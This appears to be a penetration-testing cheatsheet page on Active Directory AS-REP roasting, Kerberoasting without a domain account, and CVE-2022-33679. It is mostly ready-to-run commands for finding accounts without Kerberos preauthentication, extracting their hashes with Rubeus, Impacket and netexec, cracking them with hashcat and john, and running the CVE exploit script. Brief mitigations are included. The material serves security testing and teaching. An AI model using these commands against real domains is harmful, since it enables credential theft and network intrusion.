daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-roasting-asrep.md (6314B)


      1 ---
      2 title: "Roasting - ASREP Roasting"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-roasting-asrep.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-roasting-asrep.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Roasting - ASREP Roasting
     12 
     13 > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
     14 
     15 **Requirements**:
     16 
     17 * Accounts with the attribute **DONT_REQ_PREAUTH**
     18     * Windows/Linux:
     19 
     20     ```ps1
     21     bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName  
     22     ```
     23 
     24     * Windows only:
     25 
     26     ```ps1
     27     PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
     28     ```
     29 
     30 * [Rubeus](https://github.com/GhostPack/Rubeus)
     31 
     32   ```powershell
     33   C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
     34   [*] Action: AS-REP roasting
     35   [*] Target User            : TestOU3user
     36   [*] Target Domain          : testlab.local
     37   [*] SamAccountName         : TestOU3user
     38   [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
     39   [*] Using domain controller: testlab.local (192.168.52.100)
     40   [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
     41   [*] Connecting to 192.168.52.100:88
     42   [*] Sent 169 bytes
     43   [*] Received 1437 bytes
     44   [+] AS-REQ w/o preauth successful!
     45   [*] AS-REP hash:
     46 
     47   $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
     48   ```
     49 
     50 * [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite
     51 
     52   ```powershell
     53   $ python GetNPUsers.py htb.local/svc-alfresco -no-pass
     54   [*] Getting TGT for svc-alfresco
     55   $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4
     56 
     57   # extract hashes
     58   root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
     59   root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
     60   ```
     61 
     62 * netexec Module
     63 
     64   ```powershell
     65   $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
     66   LDAP        10.0.2.11       389    dc01           $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5
     67   ```
     68 
     69 Using `hashcat` or `john` to crack the ticket.
     70 
     71 ```powershell
     72 # crack AS_REP messages with hashcat
     73 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
     74 root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
     75 
     76 # crack AS_REP messages with john
     77 C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
     78 ```
     79 
     80 **Mitigations**:
     81 
     82 * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
     83 
     84 ## Kerberoasting w/o domain account
     85 
     86 > In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an **KRB_AS_REQ** request and trick the request to ask for a **ST** instead of a **encrypted TGT**, by modifying the **sname** attribute in the req-body part of the request.
     87 
     88 The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
     89 
     90 :warning: You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
     91 
     92 * [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413)
     93 
     94   ```powershell
     95   GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
     96   ```
     97 
     98 * [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139)
     99 
    100   ```powershell
    101   Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
    102   ```
    103 
    104 ## CVE-2022-33679
    105 
    106 > CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password..
    107 
    108 Research from Project Zero : [RC4 Is Still Considered Harmful - James Forshaw](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)
    109 
    110 **Requirements**:
    111 
    112 Accounts with the attribute **DONT_REQ_PREAUTH**
    113 
    114 * Windows/Linux:
    115 
    116     ```ps1
    117     bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName  
    118     ```
    119 
    120 * Windows only:
    121 
    122     ```ps1
    123     PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
    124     ```
    125 
    126 **Exploitation**:
    127 
    128 * Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
    129 
    130   ```bash
    131   user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
    132   user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
    133   user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares
    134   ```
    135 
    136 **Mitigations**:
    137 
    138 * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
    139 * Disable RC4 cipher if possible.
    140 
    141 ## References
    142 
    143 * [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
    144 * [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)